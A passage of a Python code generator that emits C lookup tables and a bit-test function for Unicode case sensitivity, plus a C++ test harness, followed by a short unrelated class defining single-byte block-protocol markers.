	output.append('#define kUnicodeCaseSensitiveMax\t0x%04xU' % maxCh)
	output.append('')
	output.extend(table.splitlines())
	output.append('')
	output.append('static const uint32_t UnicodeCaseSensitivityMask[] = {')
	for i in range(0, len(maskList), 8):
		line = ', '.join('0x%08xU' % mask for mask in maskList[i:i+8])
		output.append(line + ',')
	output.append('};')

	function = """
// case sensitivity for ch in [kUnicodeCaseSensitiveFirst, kUnicodeCaseSensitiveMax]
static inline int IsCharacterCaseSensitiveSecond(uint32_t ch) {{
	const uint32_t lower = ch & 31;
	ch = (ch - kUnicodeCaseSensitiveFirst) >> 5;
	ch = ({table}[ch >> {shiftA}] << {shiftA2}) | (ch & {maskA});
	ch = ({table}[{offsetC} + (ch >> {shiftC})] << {shiftC2}) | (ch & {maskC});
	ch = {table}[{offsetD} + ch];
	return bittest(UnicodeCaseSensitivityMask + ch, lower);
}}
""".format(**args)
	output.extend(function.splitlines())
	if not test:
		Regenerate(filename, "//case", output)
		return

	# test mode: write a self-contained C++ file plus exhaustive test data
	with open(filename, 'w', encoding='utf-8') as fd:
		fd.write(r"""#include <cstdint>
#include "../include/VectorISA.h"

""")
		fd.write('\n'.join(output))
		fd.write(r"""
int IsCharacterCaseSensitive(uint32_t ch) {
	if (ch < kUnicodeCaseSensitiveFirst) {
		return bittest(UnicodeCaseSensitivityMask + (ch >> 5), ch & 31);
	}
	if (ch > kUnicodeCaseSensitiveMax) {
		return 0;
	}
	return IsCharacterCaseSensitiveSecond(ch);
}
""")
		addCaseSensitivityTest(fd, caseTable, maskCount*32)
class BLOCK_MARKER:
    """Single-character protocol markers framing block operations."""
    NOP = "\x00"    # no operation
    READ = "\x01"   # read request
    WRITE = "\x02"  # write request
    END = "\xff"    # end of stream